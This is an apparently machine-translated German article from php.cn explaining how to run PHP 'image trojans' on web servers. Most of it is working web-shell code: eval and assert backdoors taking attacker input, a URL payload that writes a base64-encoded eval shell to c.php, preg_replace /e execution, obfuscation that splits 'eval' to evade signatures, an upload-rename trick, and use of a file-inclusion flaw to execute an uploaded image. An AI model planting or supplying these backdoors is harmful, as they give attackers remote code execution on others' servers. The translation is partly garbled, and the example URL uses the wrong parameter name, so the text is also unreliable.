Heim > Backend-Entwicklung > PHP-Problem > So führen Sie einen PHP-Image-Trojaner aus

So führen Sie einen PHP-Image-Trojaner aus

王林
Freigeben: 2023-02-24 12:52:02
Original
12557 Leute haben es durchsucht

So führen Sie einen PHP-Image-Trojaner aus

So führen Sie einen PHP-Image-Trojaner aus

1. Standard-Schreibmethode, PHP-Code direkt über eval ausführen

@eval ($_POST['code']);
Nach dem Login kopieren

2. Führen Sie Assert dynamisch aus, um eine Trojaner-Datei zu generieren (die beste versteckte)

@$_GET['a']($_GET['code']);
Nach dem Login kopieren

3. Verwendung: von der URL aus In den folgenden Parametern und beim Ausführen wird eine c.php-Datei im aktuellen Verzeichnis generiert

/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
Nach dem Login kopieren

Wenn der a-Parameter eval ist, wird ein Fehler gemeldet (da eval kein a ist). Die Trojaner-Generierung schlägt fehl und es wird derselbe Fehler gemeldet, es wird jedoch ein Trojaner generiert.

4. Verwenden Sie preg_replace, um den Code auszuführen (verwenden Sie einfach eine beliebige Zeichenfolge davor. Wenn diese unterschiedlich ist, kann der Befehl mehrmals ausgeführt werden)

@preg_replace("/re/e", $_POST['code'], "re");
Nach dem Login kopieren

5. Teilen Sie die Signaturen auf

session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
Nach dem Login kopieren

6. Benennen Sie eine beliebige Datei um

$reg="c"."o"."p"."y";
$reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
Nach dem Login kopieren

So nutzen Sie die Include-Schwachstelle

Manchmal laden wir einige Image-Trojaner hoch, aber sie können nicht ausgeführt werden. Wenn eine Include-Schwachstelle vorliegt, können die Image-Trojaner ausgeführt werden.

Wenn es im PHP-Code ein include($_GET['controller']) und einen URL-Pfad gibt: /index.php?controller=user, scheint dies ein entsprechendes Steuerelement zu sein, das darauf basiert die Parametereinbindung Der Code des Servers, aber wenn die Parameter im URL-Pfad wie folgt geändert werden: /index.php?uid=/upload/images/muma.jpg, wird der Trojaner zu diesem Zeitpunkt ausgeführt.

Der obige Inhalt dient nur als Referenz!

Empfohlenes Tutorial: PHP-Video-Tutorial

Das obige ist der detaillierte Inhalt vonSo führen Sie einen PHP-Image-Trojaner aus. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage